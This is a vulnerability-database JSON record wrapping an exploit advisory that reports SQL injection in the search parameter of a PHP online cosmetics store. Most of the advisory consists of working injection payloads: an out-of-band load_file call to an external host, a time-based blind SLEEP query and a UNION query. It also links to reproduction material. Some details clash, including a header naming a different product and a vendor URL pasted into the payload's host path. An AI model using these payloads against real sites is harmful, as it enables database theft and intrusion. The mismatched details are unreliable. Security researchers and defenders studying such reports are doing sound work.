{"id": "PACKETSTORM:166049", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Cosmetics And Beauty Product Online Store 1.0 SQL Injection", "description": "", "published": "2022-02-18T00:00:00", "modified": "2022-02-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166049/Cosmetics-And-Beauty-Product-Online-Store-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-18T16:52:42", "viewCount": 44, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "vulnersScore": 0.4}, "_state": {"dependencies": 1646409666}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166049/cbpos10-sql.txt", "sourceData": "`## Title: Cosmetics-and-Beauty-Product-Online-Store v1.0 remote SQL-Injections \n## Author: nu11secur1ty \n## Date: 02.18.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html \n## CVE-Medical Store Management System v1.0 \n \n \n## Description: \nThe search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0 \nappears to be vulnerable to SQL injection attacks. \nThe payload '+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\\\vcu'))+' \nwas submitted in the search parameter. \nThis payload injects a SQL sub-query that calls MySQL's load_file \nfunction with a UNC file path that references a URL on an external \ndomain. \nThe application interacted with that domain, indicating that the \ninjected SQL query was executed. \nWARNING: If this is in some external domain, or some subdomain, or \ninternal, this will be extremely dangerous! \nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: search (GET) \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\\\vcu'))+'') \nAND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM \n \nType: UNION query \nTitle: Generic UNION query (NULL) - 7 columns \nPayload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select \nload_file('\\\\\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\\\vcu'))+'') \nUNION ALL SELECT \n47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47-- \n- \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store/SQL-Injection) \n \n## Proof and Exploit: \n[href](https://streamable.com/9b2avg) \n \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://packetstormsecurity.com/ \nhttps://cve.mitre.org/index.html and https://www.exploit-db.com/ \nhome page: https://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n"}
{}